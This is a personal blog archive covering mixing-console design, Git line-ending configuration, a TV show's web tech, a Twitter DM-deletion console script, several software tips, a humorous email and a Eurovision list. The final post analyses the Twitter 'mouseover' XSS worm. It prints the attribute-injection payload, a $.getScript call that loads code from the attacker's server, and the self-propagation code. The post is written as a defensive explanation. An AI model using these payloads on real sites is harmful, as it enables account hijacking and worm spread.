This is what “the perfect mixing console” should be in 2022

Mixing consoles have come a long way in the last couple of decades. A lot has improved, to the point where today I think we might be close to what I’d call “the perfect solution”. We’re close but not quite there yet. Here’s what I think is missing.

I’ve been doing sound reinforcement for all kinds of live performances for the last… phew, 15-20 years or so – it certainly feels like its been that long. During that time, I’ve used all kinds of equipment for mixing: I used analog and digital mixers from companies like LEM, Yamaha, Soundcraft, Behringer,… I even had to use my smartphone once (that wasn’t planned but saved my ass, but that’s another story). A lot has changed in the mixing space over these years. A lot has improved, to the point where today I think we might be close to what I’d call “the perfect solution”. Of course, a “perfect solution” is highly subjective. What I consider “perfect” might not meet someone else’s needs at all. You probably won’t agree with everything, but I think I can speak for the majority of small to medium and maybe even some large scale productions. So let’s look at what’s out there and what it needs to become my “perfect” solution.

First, it has to be digital. I’m a digital native and a software engineer. By now I can handle fader banks, layers, virtual patching etc. Nobody wants to carry huge analog consoles, snakes and a truckload of outboard gear anymore these days. Let’s just take that as a given.

Second, I don’t own or work for a production or dry hire company. By that I mean: while not being the only criterion, price is something I have to keep in mind. For the kind of work I do, consoles from manufacturers like DiGiCo or Avid are simply way too expensive. The good thing is that, again, for the work I do, I don’t need such high end consoles. So for me, this rules out high priced solutions. Then there are solutions that are “affordable for mere mortals” but aren’t that great (e.g. I have used a Yamaha TF3 and can only agree with its critics). When it comes to price performance ratio or “bang for the buck” in a price range I’d call “affordable”, there’s just no way around Behringer. While there are a couple of great alternatives from companies like Soundcraft, Allen & Heath or Presonus, it always seems like they’re missing a handful of features or are less flexible when compared to the matching Behringer product, while always being a bit more expensive. Since Behringer (or rather “Music Tribe” as their mothership is called today) acquired Midas and Klark Teknik in 2009, they’ve been able to mix and match these companies’ technologies to bring even more “bang for the buck” and make competitor’s lives even harder. Look, I don’t want to sound like a Behringer fanboy and there are certainly valid alternatives out there. But for me, Behringer’s X32 ecosystem (which is compatible with Midas’ M32 one if I ever need something “more solid”) is the one I went with a couple of years ago. And since it’s the ecosystem I know the best at this point, I’ll take it and its products as examples from here on – knowing that they’re certainly not the “only” nor necessarily the “best solution for everyone” out there. I hope you can bear with me even if that particular ecosystem is not your cup of tea.

After ruling out analog mixers and high-end prices, the next thing to consider is the feature set and flexibility of the solution. Your “required” or “desired” feature set will heavily depend on your use case. Here are just a few things to take into consideration:

  • Quality of available AD/DA converters and Preamps
  • Total number of input channels the mixer engine can handle
  • Number of buses (are they stereo / mono?)
  • Quality of on-board plugins (EQs, dynamics, effects,…)
  • Digital routing flexibility (e.g. can I feed the delay return back into the reverb?)
  • Ease-of-use / flexibility of the available control surfaces (more on that later)

Usually, most of these things are pretty decent these days. One thing that bugs me with the X32 platform is the available number of mix buses. I find 16 mono mix buses somewhat limiting when you consider that you need them for effects, as IEM/monitor mix buses and sub groups. DCAs can avoid the need of subgroups in some cases, but with some projects I like to use group compression or to put a de-esser on a vocal group because of too few FX slots to put them on individual vocal channels. A DCA group just can’t do these kinds of things. Additionally, if I’d like to pan backing vocals or deal with stereo signals in subgroups, a mono bus just isn’t enough… long story short: I tend to run out of mix buses fairly easily. Fortunately, Behringer’s next-gen Wing engine comes with 16 stereo buses, which should make my life much easier – once I’ll be able to use that Wing engine (we’ll get to that later).

Another X32 pain point is the limited routing flexibility. To be fair, this has improved with newer firmware versions: The workaround they found to make the group-of-8 patching more flexible feels clumsy but at least there is one. But besides that, we still encounter seemingly arbitrarily limitations. For example, adding salt to my previous pain point, you can only chose a channel’s pickup point for pairs of buses. Wanna put an FX send bus next to an IEM bus? Well, depending on which bus numbers you have at hand, that might not be possible.

Bus send page of the X32-Edit Mac App

The Wing engine lifts this limitation as well. In general, it allows for a lot more flexible routing across the board than the X32 engine. I heard some concern that this increased flexibility might get some less experienced users lost but as far as I’m concerned, I always embrace more flexibility. Less experienced users can always be guided by a good user interface and this can be improved by software updates. If the engine doesn’t allow flexibility however, that’s a wall that power users are going to hit sooner or later and that’s not solvable by software updates. So well done on the Wing engine for this one, Behringer!

So far I’ve only been narrowing down existing choices and at this point, you might be wondering about the “what’s missing” part I promised. Well then, here it is:

Hardware portability and modularity

Unlike all other areas, it seems this one doesn’t keep on getting better with every new model. There has been some good in the past but also some very bad – even with some of the most recent models.

In the pro audio industry, there seems to be this belief that “to be credible, a console has to be huge and heavy”. Why is that? If I hadn’t already ruled out DiGiCo consoles because of their premium price tag, I certainly would’ve done so now: you need a warehouse to store them and a truck plus a whole crew to get these things from A to B (maybe with the exception of the SD11). Don’t get me wrong though! For large-scale productions, big consoles on which you have a great overview and direct access to as much of your mix as possible are absolutely justified and even desirable (and since that’s what DiGiCo is going for, their big consoles’ size is perfectly justified). However, most small-to-mid sized productions and projects aren’t going to need big control surfaces like this. So making these things huge and heavy should be a thing of the past. Move on, get creative, make things smaller and lighter and save all our backs.

DiGiCo SD7
97OllieB, CC BY-SA 4.0, via Wikimedia Commons

This might come as a surprise but when I switched to the X32 ecosystem, I specifically chose against any of the X32 models with a control surface. I chose the X32-Rack and I am still more than happy with that decision. See, at that time, I had (and still have) lots of gigs with recurring performers / bands and I usually have the chance to build a solid console scene in advance. During the event, the amount of tweaking can be kept to a minimum. Also, with one of my projects we regularly perform as one of several acts at shows that are already running when we arrive. On stage, we have to set up a 4-piece band with instruments, backline, microphones, mixer, monitoring and have a 2xXLR stereo signal ready in ~ 5 minutes, all of this with only the musicians and me as the sound guy. Also, I don’t have a fixed FOH spot most of the time so I need to be wireless and able to position myself wherever I want in the venue.

These scenarios led me to go for an X32-Rack as the mixer and an iPad with the M32-Mix app as the control surface. The portability of this solution is stellar: A single portable rack on wheels with a handle that looks more like hand baggage than a flight case (called “Rackbag” and built by Gator) holds the console, a network router with a detachable wireless access point, a power distribution strip and even the iPad itself. When I need the 8 extra inputs, I have an SD8 digital stagebox sitting in a transport bag ready to go. All of this is lightning fast to set up and fits on the passenger seat of any car. I LOVE it, so much in fact that I never want to go back. That brings me to my criteria: the whole mixing solution has to be sized and have a weight such that a single person can carry every individual part of it and the whole solution has to fit in pretty much any regular car – all of this with the equipment safely sitting in appropriate transport cases.

X32 Rack in a Gator Rackbag

You might think that my usage scenarios are corner cases and that controlling even a mid-sized event without a ready-to-go mixer scene and only with an iPad is anything but comfortable – and you’d be absolutely right: I’d never do that. In fact, we only talked about portability until now, but here’s where modularity comes into play. A highly scalable solution would have to separate the 3 elements that make up a modern digital console: the engine, the i/o and the control surface. With “the perfect solution”, it must be possible to mix and match any of them. Having this modularity would help achieving the portability goals pretty easily by the way. In fact, this idea isn’t new. While I was researching for this article, I reminded myself of the Avid VENUE S3L console. With the S3L, Avid did exactly that: they separated the engine from the i/o and the control surface. The S3L was arguably among the most elegant live control surfaces I’ve seen to date. Unfortunately, as said before, that solution was way above my budget, and besides that it seems it has been discontinued in the meantime in favor of, yet again, huge and heavy fully integrated VENUE control surfaces.

Avid VENUE S3L control surface in use
BasshagCC BY-SA 4.0, via Wikimedia Commons
Avid S3 control surface product picture
Source: https://www.avid.com/products/avid-s3

So let’s look at Behringer again. I think we can agree that they modularized the i/o part pretty flawlessly: They have 8×8 all the way up to 32×16 digital stage boxes. If you want even better preamps, Midas has you covered. If you’re looking for personal monitoring solutions, there’s the Behringer P16M or the Midas DP48. I know I sound like a sales rep at this point, but that part is modularized, flexible, compatible and there’s not a single device that doesn’t meet my portability criteria, so hey: thumbs up to that!

Now when it comes to the modularization of the engine and the control surface, things don’t look so good. In fact, I have a couple of projects coming up where I won’t be able to have a ready-to-go mixer scene and where I could have a fixed FOH space in the venue. An iPad as the only control surface doesn’t seem ideal. I’d really like to bring a control surface with me but today’s options are… disappointing. After all the praise I gave to the X32 and Wing ecosystems before, unfortunately I cannot do the same when it comes to modularity and portability of their control surfaces. Yes, there’s the X-Touch family of products that work with the X32 family of consoles. So there is some modularity here, great! However, it seems like X-Touch has been primarily built to control DAWs in the studio. Yes it can control X32 consoles complete with parametric EQs, dynamics, some routing, mute groups etc. but the way the controls are mapped onto the rotary encoder row seem far from intuitive. The goal of a control surface is to be able to quickly reach a setting and tweak it and while I think the X-Touch is a great start when it comes to control surface modularity, it’s not what I’d consider “the perfect solution”. (Also its price recently jumped up despite its age, making it even less attractive).

A Behringer X-Touch annotated to be used with an X32 engine
Source: getlostinsound on YouTube, https://www.youtube.com/watch?v=ugm2-tLwnnU

Why can’t I have a control surface like the Wing? The Wing’s control surface looks awesome, it has everything I want: a big comprehensive touch screen, a bunch of faders and control knobs – that’s it. Plus, it’s super slim right? Wrong! Yes, the Wing’s control surface (the light gray part) seems really slim. Unfortunately, Behringer decided to attach the “engine” part of the console to the bottom of the control surface. As great as the Wing is, I think this was a really bad decision. I can only guess the reasoning behind it. It’s probably because it’s more ergonomic to have big consoles be pointing at the user at an angle rather than laying horizontally flat on the table. So why not just use that angle and put the mixer engine and some digital and analog i/o there? Well because it wastes an incredible amount of space. Case builders now have to enclose a huge volume of air. The flight case itself ends up so big that it’s not portable by a single person, cannot be transported in a regular car and probably only be stored in a warehouse. Exactly like the original full-sized X32. It’s really a huge missed portability opportunity.

Behringer Wing Console Flight Hard Travel Case by ZCase product image
Source: https://www.proxdirect.com/products/view/Behringer-Wing-Console-Flight-Hard-Travel-Case-Flip-Ready-Easy-Retracting-Hydraulic-Lift-for-by-ZCase-XZF-BWING#largeSlide

How can this be improved? Well, first of all, detach the control surface from the engine. If you really want it to be tiltable, add a retractible mechanism underneath it like you did for its touchscreen. Make the engine a 3-4U sized rack-mount unit that comes with digital and some analog i/o out of the box (hint: just like the X32-Rack). The rest of the control surface could be kept as-is for large-scale events. Personally, I don’t need to mix with 2 engineers and I’d like a smaller version of it: so for “the perfect solution”, make the controls just a bit more compact and shave off some faders and about 1/4 of the “do whatever you want with it” knobs. A slightly smaller Wing control surface could lean towards the Avid S3L in terms of thickness and size and could fit in a perfectly sane-sized, very slim flight case that would meet all the portability criteria above. Just make sure the touchscreen keeps the same size.

With a modular solution like this, I could just take the engine with an iPad for my quick-and-dirty gigs, attach a bunch of i/o if needed and attach a bigger flexible control surface when things get serious. And all of that could be carried by a single person, transported in a regular car and stored in a regular basement. There we have it, “the perf…” – no wait, there is one more thing.

There’s one aspect that tends to be forgotten when it comes to modularizing a digital console: what about the local i/o I do want to have at the FOH? Like a talkback microphone, a pair of headphones or near-field monitors, a CD/mp3/media player of some sort or even outboard gear? All of these could be very important depending on the scenario but now that we’ve separated the control surface from the engine, there’s no audio left at the control surface. That is actually already one of the major downsides of the X-Touch products today: no talkback, no monitoring and no local i/o at the FOH.

Sure, I could place the engine itself at the FOH and use its analog i/o or attach an external i/o box. However, that still doesn’t give us a ready-to-be-used headphone amp and connector. Plus, I could easily imagine scenarios where it would be more suitable to have the engine running on or behind the stage and we want to be flexible after all, right? At this point, we have to ask ourselves the question: how would the control surface and the core be communicating? As it stands today, it seems to me that Behringer maneuvered themselves into a corner here: AES50 can carry audio over a CAT5 (ethernet) cable, the consoles can be controlled via ethernet – but while they use the same type of cables, the protocols are not the same. AES50 cannot be routed by your standard TCP/IP router and can, to my knowledge, not transport remote control data (yet?). On the other hand, regular TCP/IP networks like the one used for remote controlling the X32 from the X-Touch or an iPad are notoriously bad at real-time / low latency multichannel audio (with Dante probably being the best option in this space, but that’s out of scope for the problem at hand). So as it stands today, it seems to me like you’d have to connect the engine with the control surface with 2 CAT5 cables (one for controlling, one for audio) if the latter should have some local audio i/o. Alternatively, Behringer could use their new StageConnect technology to get some audio to/from the control surface. But since that uses a regular XLR cable, you’d still have to run 2 cables and that would still be less than ideal. So this remains one of the problems left to be solved: being able to remote control a console while also sending a bit of audio back and forth using a single cable.

So to summarize: a lot of aspects are very good already in today’s digital console platforms: They are available in all kinds of sizes while the on-board feature sets usually cover today’s needs pretty well. Digital stage boxes – because of their nature – are well modularized already: They’re flexible, portable and are available at different quality- and price levels. What’s missing is modularity, portability and flexibility for the rest of the hardware, especially control surfaces.

Eclipse & Git: Mind your Windows line endings!

Recently, our team at work stumbled upon a strange behavior in their Git projects: there were files with Windows CRLF line endings checked into the git repository. If you know git, you’re aware of the line ending settings and that line endings basically should never be an issue. Well, turns out: it is, and it is quite often.

How it should work

While investigating the issue, I found the excellent Mind the End of Your Line article over at adaptivepatchwork.com, which explains how line endings should be handled in the first place. It also helped me find the cause of the issue, so props to them!

The most important bit in this case is the core.autocrlf setting. As every git setting, it can be specified per-repository or globally (per OS user). On Windows, it seems to be recommended setting it to true, causing git to use Windows CRLF in the workspace and auto-converting line endings to LF when committing to git’s object database. Going with the input setting also shouldn’t cause too much trouble: in this case, git checks line endings out into the workspace as they are in the object database without changing them, but still makes sure to replace any Windows CRLF line endings with linux LF when committing to git’s object database.

The only core.autocrlf setting to avoid at all cost, at least on windows, is false. This would cause git to commit line endings into its object database exactly as they appear in the workspace (the only setting letting Windows’ CRLF into git’s object database).

Our setup

We are mostly dealing with java projects, but our repositories contain a bunch of shell scripts for automation, testing and stuff like that. Our development machines are Windows workstations while test and production servers are linux/unix. We use Eclipse along with its egit plugin for development.

The symptom

I once had to merge a huge feature branch. After resolving merge conflicts and committing my changes, I noticed that pushing the merge took longer than usual. Also, the git repository had nearly doubled in size. It turned out that my merge just changed every single text file’s line endings to Windows CRLF in the repository.

I fixed it by resetting everything to linux LF line endings. However, after a couple of months, we noticed that Windows line endings were slowly crawling back into the repository – apparently cumulating through multiple developers’ commits and merges over time.

Pinpointing the problem

This turned out to be a nightmare. It took an awful lot of time to reproduce the problem, let alone find a logical explanation to why this kept happening.

Whenever I ran git config core.autocrlf in a repository, it always yielded the expected input, so I didn’t suspect the autocrlf option and didn’t care that git config --global core.autocrlf wasn’t set. I ended up creating a test git repo and running a bunch of merges with intentional conflicts before I was able to pinpoint the exact constellation causing the problem:

As it turns out, it is a combination of the git spec, the windows git command-line and Eclipse’s egit plugin causing the issue.

  • The git documentation states that settings are either found in the current repository’s ./.git/config file or the global %HOME%.gitconfig, the latter being the fallback if they’re not found in the former. It also specifies that the default value for the core.autocrlf setting is false – remember? the worst setting there could be on Windows if line endings matter…
  • The Windows git client (from git-scm.com) does ask for the core.autocrlf setting during setup to make sure you have it set, but it doesn’t seem to store it in the documented global location (%HOME%.gitconfig). Instead, it seems to store it somewhere else (I haven’t found where though) and uses this location as ultimate fallback during command-line git invocations when the setting isn’t found in the usual locations. As long as you only ever use the command-line git, you’re fine, however…
  • Eclipse’s egit plugin doesn’t use the command-line git client directly but comes with its own implementation, which does honor the documented locations and settings. However, as the “magical ultimate fallback” used by the Windows git command-line client seems to be undocumented, Eclipse couldn’t possibly know about it. So from Eclipse’s point of view: No core.autcrlf in the repository, no core.autocrlf in %HOME%.gitconfig: use the default value: false. If you then happen to commit merges, or even worse, if you previously cloned a repository with core.autocrlf set to true, your Eclipse will end up committing everything with Windows line endings while your command-line git behaves perfectly fine.

I checked with some colleagues from other teams and they also had the global core.autocrlf setting unset – and incidentally, their Eclipse was behaving strangely in the git synchronize view. After they set the global setting, everything was fine. So it looks like manual action is needed to make it work correctly.

Oh, and to make things even worse: I currently suspect something to overwrite my %HOME%.gitconfig, removing the core.autocrlf setting as it magically disappeared somewhere in the last weeks. I’m not quite sure what it is tough…

In conclusion, TL;DR

If you use Eclipse and Git on Windows, make sure you have the core.autocrlf option globally set to true AT ALL TIMES!

To check for the option:

    git config --global core.autocrlf

(this should yield true).

To set it:

    git config --global core.autocrlf true

May this post help other poor souls like me! 😉

– Cheers!

Die Technik bei Pro7’s “Keep Your Light Shining” – ein Kommentar

Gleich 2 deutsche TV-Sender haben in diesem Monat neue TV-Formate an den Start gebracht. Was so besonders daran ist? Sie binden die TV-Zuschauer überaus interaktiv und umfangreich über das Internet in’s Geschehen der Sendung ein.

Zum einen war da das Quizduell. Die ARD hatte den Vortritt… und hat gleich mal in’s Klo gegriffen. “Ein Hackerangriff”, so hieß es, habe die Server lahmgelegt. Im Nachhinein ist allerdings gar nicht so klar, ob es sich nicht doch nur um die zu erwartende hohe Last einer TV-Livesendung gehandelt hat. Besonders zu betonen ist allerdings, dass alle Beteiligten den Fail sportlich und mit Humor genommen haben. So kann ich jemandem einen solchen Fehltritt auch gerne verzeihen, ist ja schließlich alles #Neuland 😉 Etwa eine Woche später war dann technisch alles behoben und die Show konnte wie geplant mit Beteiligung der Internet-Nutzer stattfinden.

Heute waren dann die privaten Sender an der Reihe. Vertreten durch Pro7 mit der Musik-Show “Keep Your Light Shining”. Aus Spaß und Neugier habe ich heute tatsächlich mal eine app an mein Facebook-Profil gelassen und per Browser mitgemacht.

Ich war von der Technik von Anfang an begeistert. Wie die Entwickler es hinbekommen haben, die Web-Applikation so synchron zum TV-Bild zu halten ist wirklich bemerkenswert. Die Show funktioniert so: Es wird in jeder Runde ein Lied gesungen. Von allen Kandidaten abwechselnd, im 30-Sekunden Takt. Die Webseite aktualisierte bei jedem Kandiaten-Wechsel die Anzeige entsprechend… und das, zumindest für mich, fast auf die Sekunde genau synchron zum TV-Bild. Komplett in HTML5, ganz ohne Audio-Watermarking und sogar ohne WebSockets.

Da ich in dem Bereich ja kein ganz unbeschriebenes Blatt bin, habe ich mir während der Sendung die von Pro7 eingesetzte Technik mal etwas genauer angeschaut und ein paar best practices abgeleitet 🙂

Als View-Layer wurde Facebook’s React eingesetzt. Damit wurde die Mechanik der Applikation größtenteils im Voraus in JavaScript programmiert. Eine JSON Konfigurations-Datei hat der Applikation die Kandidaten der Woche mit allen Details wie Name, Bilder usw. mitgeteilt (so muss nur diese eine Datei für die nächste Episode der Sendung ausgetauscht werden). Es sind also in erster Linie eine handvoll statischer Resourcen involviert gewesen: die kleine HTML-Datei, React selbst, die KYLS-JavaScript-Applikation, die JSON Kandidaten-Konfiguration, ein bisschen CSS und ein paar Bilder wurden via Amazon’s CloudFront verteilt. Durch dieses hochperformante CDN ist das Ausliefern der statischen Resourcen kein Problem.

Bleibt noch die Synchronisation und das tatsächliche Voting.

Die Synchronisation wurde, soweit ich das beurteilen konnte, durch “stinknormales” 10-Sekündiges Polling realisiert. Zu erwähnen ist hier, dass beim Polling auf jedes Byte geachtet wurde: Übertragen wurde ein JSON-Objekt mit ein-buchstabigen keys und nur numerischen IDs und arrays als Werten. Das JSON Polling übermittelt den Stand der Sendung (aktuelle Runde, wer in dieser Runde noch drin ist, wer gerade singt,…) an die React Applikation. Was hier auf Serverseite verwendet wurde, kann ich natürlich nicht wissen. Ich weiss nur, dass sich als Webserver ein “Apache” gemeldet hat, und dass auch bei dieser Applikation auf Amazon’s Cloud gesetzt wurde. Per DNS RoundRobin kamen gut drei Dutzend Amazon-Server rein (danach habe ich mit Anfragen aufgehört ;)) – die Cloud halt. Mich würde aber wirklich interessieren, was hier serverseitig für die Persistenz bzw. als Datenstore genommen wurde…

Das Voting, also Daumen-Hoch oder Daumen-Runter Clicks, wurde, ähnlich wie das Polling, mit einem eigenständigen XMLHttpRequest an die Amazon-Server realisiert. Dieser beinhaltete die Runde und die Kandidaten-ID als URL Parameter. Ich vermute, die eindeutige User-ID (vom Facebook-Konto) war in irgendeiner Form in den Cookies enthalten. Keine Magie, alles straight forward.

Fazit: so viel wie möglich statisch machen, möglichst kein dynamisches HTML auf Serverseite rendern sondern JS-Client-Libraries wie React verwenden, den statischen Content cachen und auf CDN’s setzen, skalierbare Applikationsserver (zB Amazon’s Cloud) für Interaktionen verwenden, bei Live-Updating/Polling jedes Byte sparen.

Mir hat die Sendung jedenfalls aus technischer Sicht, Spaß gemacht! Ich bin gespannt was für Internet-Formate sich die Sender weiterhin so ausdenken, was davon technisch hinhaut, und wie es gebaut sein wird 🙂

How to delete entire twitter conversations (direct messages)?

I recently wanted to delete a massive twitter conversation with thousands of messages. To my surprise, there’s no way to delete a whole conversation with a single click in the Twitter.com Web GUI. The Twitter MacOS App has a “Delete Conversation” entry in a conversation’s context menu, but that just removes it from the Gui. Restarting the app shows that it is, in fact, still present.

My guess is that their Message storage doesn’t allow efficient deletion of conversations. But what if I _really_ want to get rid of them?

An option is to search for these services… you know… those shady ones that claim they can do the job for you, want access to your twitter account and, after you have granted them full access, ask you to take out your wallet and pay if you _really_ want them to help you. Well, F such a business model. Seriously.

There’s an easier, much safer way to delete entire conversations and guess what: I’ll tell it to you for free!

Okay, here’s what you do:

  1. Open Chrome (we’ll need the developer console. Other browsers might work, too, but I use Chrome, so I’m gonna stick with it here)
  2. Log in to twitter and go to your “Me” page
    https://twitter.com/<yournick>
  3. Open your messages (the button with the envelope) and select the conversation you want to delete. You now have the conversation-to-be-deleted in front of you.
  4. Open the JavaScript Developer console (Command+Alt+J on Chrome / MacOS)
  5. Paste the following JavaScript into the console and press enter:
    $('#global-actions').append($('<li id="del-script">').append($('<a class="js-nav">"').text('...')));
    window.delscrpt = setInterval(function() {
      $('.js-dm-error:visible').each(function() { $('a.js-dismiss', this).click(); });
      var count = $('.js-dm-delete').length;
      if (count < 3) {
        $('#del-script a').text('Del Done.');
        clearInterval(window.delscrpt);
        return;
      }
      var randIdx = Math.floor((Math.random()*count)+1);
      $('#del-script a').text('Del ' + randIdx + '/' + count);
      $('.js-dm-delete').eq(randIdx).click();
      $('.dm-delete-confirm .js-prompt-ok').each(function() { $(this).click(); });
    }, 2000);
  6. Sit back, relax and watch your conversation disappear one message at a time.

DISCLAIMER:

  • Don’t expect any support. Use at your own risk. I think this should be pretty obvious 😉
  • This method works by directly manipulating the HTML DOM of the twitter page (remote controlling the GUI if you will). It works for now (mid-September 2013), but if twitter changes their homepage, this method will die. Keep that in mind.
  • The deletion might take some time. We don’t want to hammer the twitter servers and get our account blocked after all 😉
  • Twitter has some major issues with message deletion (internal server error’s and stuff). That’s why we can’t delete messages in order and have to delete them randomly until the conversation is empty. You can’t just delete parts of a conversation. You’ve been warned.
  • The script will stop when less than 3 messages are left in the conversation, in order not to bug out. You’ll have to spend the 10 seconds and delete these last messages manually.
  • The script displays some numbers in the twitter navigation bar (in the background). The first number is the index of the randomly selected message that’s being deleted from within the returned message list. The second is the total number of messages currently returned by the twitter servers. This total number doesn’t represent the “real” number of left-over messages all the time. That’s just because of the way twitter works and spits out your messages… Non-deterministic NoSQL and stuff…

Hope it’s useful to anyone 🙂

Eclipse: “Insufficient access privileges to apply this update”

If you’re trying to update your Eclipse on your magnificent Windows box* through the integrated update mechanism, and are seeing “Insufficient access privileges to apply this update” when you try to select an element, just run Eclipse with admin privileges and it should go through.

To quickly run Eclipse with admin privileges: open the start menu, search for “Eclipse”, point to it and run it with CTRL+SHIFT+Enter.

* WARNING: Irony

Running Google Chrome with custom Proxy on OSX

Since Lion, Safari has a painful memory leak issue that keeps filling up all of my Mac’s ram when I keep the browser open for a couple of days (closing tabs after use of course). Since this is incredibly annoying, I ended up switching to Google Chrome and … boy that thing is fast!

However, I ran into an issue when I tried using Chrome at work: We have very $*#(%#@_ Proxy settings here. Long story short: Chrome only works with one given set of proxy settings, and all other applications only work with another set of proxy settings. The fact that Chrome absolutely wants to use the OS Proxy settings (in fact, doesn’t even come with custom Proxy settings) was a killer and made the whole browser useless to me… at first 🙂

I started looking into Chrome extensions that promised to switch proxies and use custom ones… It looked to me like they were trying to change the OS’ Proxy settings, which is totally not what I wanted.

After some Google’ing, I finally came across this OSX hint. And YES, it works! 🙂 Together with a little bit of Automator magic, here’s what I ended up doing:

  1.  Open Automator
  2. select to create an Application
  3. Double-click Run Shell Script in the Library/Utilities folder
  4. replace the text content — cat — with the following:
    open -a “Google Chrome” –args –proxy-server=host#:port#
    (Replace host# and port# with the host and port numbers that you need to use)
  5. Save as application somewhere and use it to launch Chrome with your specified proxy.
That’s it, works 🙂

[Java] If you can’t login to your Glassfish Admin Console these days…

If you use Oracle’s Glassfish Application Server and cannot login to your admin Web Console (server loads forever after entering credentials), here’s what’s going on:

The Admin Web Application loads the available module updates from java.net upon login… however, if java.net is down (like right now), or if your internet connection died or is slow, your admin console won’t load. No, they didn’t build in a timeout and yes, this is the default behavior. Thanks, Oracle!

Fortunately, there’s a workaround (you might want to apply in any case…). There are two steps to get your Glassfish Server internet-independent:

  1. Disable Automatic Update Checks
    Rename $GLASSFISH_INST/glassfish/modules/console-updatecenter-plugin.jar to console-updatecenter-plugin.jar.disabled
  2. Disable News and other Internet-Dependent Admin GUI Features
    Set the following System Property (you can do that in the Admin GUI -provided that you can open it- in Configuration > JVM Settings > JVM Options):
    -Dcom.sun.enterprise.tools.admingui.NO_NETWORK=true

That’s it! Now go out and enjoy your independent server 🙂

Take it with humor :)

Today, I crawled a pile of old eMails and found 2 special-looking ones. They were from a well-known software company. Here’s the First one:

Confirmation [company event] 2011

Dear Mike,

We hereby confirm your registration for the [company event]. Below you will find some useful information about the event.

DATE […]
VENUE […]
ROUTE […]

REGISTRATION
Please print this confirmation and present it at the registration counter.

AGENDA
Registration starts at 8:00 AM. Coffee and tea will be available. The first session starts at 9:30 AM. The final session ends at 5:00 PM. […]

DRESS CODE
Business or business casual.

We are looking forward welcoming you at the [company event].

Kindest regards,
The [company event] Team

Of course, I never registered for that conference, but I must have an account on their website for them to have my email address… I guess… Well, here’s the second eMail from them, sent only about two and a half hours after:

Dear Mike,

We sent you a confirmation email for the [company event] in error. Please ignore this email as you did not register for this event.

We apologize for the inconvenience.

Kind regards,
The [company event] Team

Well, not a big deal to me, these things happen. But as it’s such a good weather today and I’m in a pretty good mood (despite me having to get back to work tomorrow after a week off), I answered their second mail… with a bit of humor 🙂

Dear [company event] Team,

Oh dear! What a terrible mistake… I was so looking forward to participating in the event after I got your first mail… Not only was it quite a letdown when I got the second one, but I also had to cancel my flight, the baby- dog- and fish-sitters and get all the food I’d need to stay at home, frustrated, knowing you just virtualized my forum attendance…

Don’t you think I’d deserve a [company product] license for the caused inconvenience? 😉

Best regards,
Mike

… looking forward to hearing from them 😀

Note: Used square brackets to anonymize the company, as accusing them isn’t the goal of this post 😉

My ESC 2011 Top 10

It’s been awhile since I last took the time to write a piece of text longer than 140 chars 😛 So let’s take the Eurovision Song Contest (ESC) 2011 as an occasion to update my blog.

Yah, I know, there’s some controversy around the contest, “European Neighbor Contest” etc, and honestly, I hadn’t even planned watching it this year. But what can I say, it got me again. I guess, being a musician myself, there’s no way around the biggest European music event anyway. So I watched (at least a major part of) it live and got myself the album afterwards.

After listening to it a couple of times, I gotta say there were a whole bunch of great songs in the contest this year. An accurate Top10 list is almost impossible to compile, but since Top10 lists are so popular on the internetz, I made an effort. So here’s my personal ESC 2011 Top10 (based solely on the songs themselves, not the live performances nor the YT-Videos):

  1. Coming Home / Sjonni’s Friends (Iceland) [YT]
  2. In Love For A While / Anna Rossinelli (Switzerland) [YT]
  3. New Tomorrow / A Friend In London (Denmark) [YT]
  4. The Secret Is Love / Nadine Beiler (Austria) [YT]
  5. Running Scared / Nikki & Ell (Azerbaijan) [YT]
  6. Never Alone / 3JS (The Netherlands) [YT]
  7. Change / Hotel FM (Romania) [YT]
  8. Que Me Quiten Lo Bailao  / Lucia Perez (Spain) [YT]
    [Strong contestant for the Summerhit-2011 Title btw!]
  9. One More Day / Eldrine (Georgia) [YT]
  10. Da Da Dam / Paradise Oskar (Finland) [YT]

 

The Twitter “mouseover” hack – here’s how! [Update]

This article is mainly about the worm, not about the spam, but the mechanisms are similar.

First off, it wasn’t me. No, seriously. I just investigated after the fact to find out how such a huge flaw could have been possible and to find out what errors _not_ to do in my next web project. You’ll need some basic html/javascript/common sense knowledge to follow me here but I’ll try to keep it simple 😉

Step1: The breach

Apparently, there is was (it’s fixed now) a bug in the twitter website when it came to transforming tweet text that looks like a link, to an actual link you can click on. This code has to identify text starting with “http://&#8221; like “http://twitter.com” and transform it to an actual link, which, in HTML, looks something like:

<a href="http://twitter.com">http://twitter.com</a>

The bug was that twitter didn’t recognize the end of a link properly. By inserting @" at the end of a legit URL, an attacker was able to escape the href attribute and inject code into the HTML code the twitter engine made out of his URL. Once you’re able to inject code into a website, hell’s doors are open. To the browser, it looks like twitter put that code there. Boom!

So for example by putting the link:

http://foo.bar/@"alt="google.com"

in a tweet, an attacker woulld have made the twitter engine generate the following HTML:

<a href="http://foo.bar/@"alt="google.com"> ...

Which, in this harmless case, would have printed a link to foo.bar with a hover label of “google.com”.

Step 2: Loading evil code

However, to do evil things, an attacker would need more than 140 chars worth of code. Therefore, he needed to load additional evil code. Here’s how:

So the attacker was able to inject code inside an HTML link. The thing is that HTML allows an “onmouseover” attribute in a link element, which executes javascript code when the mouse is hovered over that link.

Looking at the twitter HTML source, anyone interested can learn that they use the JQuery javascript framework. This framework is loaded into the twitter page anyway, so the attacker was able to happily use this framwork’s functions. To his great pleasure, the framework has a function called $.getScript(url) which loads javascript code from the specified URL.

By using this function in combination with the onmouseover attribute, the attacker was able to load additional evil code from his own server. This code got immediately executed by the browser.

Step 3: Spreading the word

The key to success for any worm is spreading the word (a.k.a. sending itself to the max ppl it can).

Since the attacker has control over a user’s twitter site anyway, he can control his browser to put the same maliciously crafted link that started the whole story into the controlled user’s status update box and pushing the “tweet” button. This is amazingly simple in javascript using JQuery and knowing twitter’s HTML source:

$('#status').val("http://t.co/@"onmouseover="$.getScript(my_javascript_link)"/");
$('.status-update-form').submit();

That’s it.

Step 4: Do it with style

OK the basics are set up. Now let’s add some style. There are a couple of things the attacker can improve:

First of all, the user would still have to hover over the link for the hack to fire, since the attack relies on the execution of “onmouseover”. To maximize the chance the user hovers over the actual link, let’s just print the link in a HUGE font size, filling up all the browser so the attacker can be SURE the mouse will hover over it. Since we control the HTML displaying the link, we can just put the following in:

style="font-size:999999999999px;"

Done.

Next, the short URL. A tweet has 140 chars so the attacker needed a URL shortening service to point to his malicious javascript file. In this concrete case, he used is.gd. Actually, is.gd is really gd because they were reasonably fast at disabling the redirection, which helped stop spreading the worm. The attacker would’ve been better off registering its own controlled, short, domain… but who am I to give such tips 😛

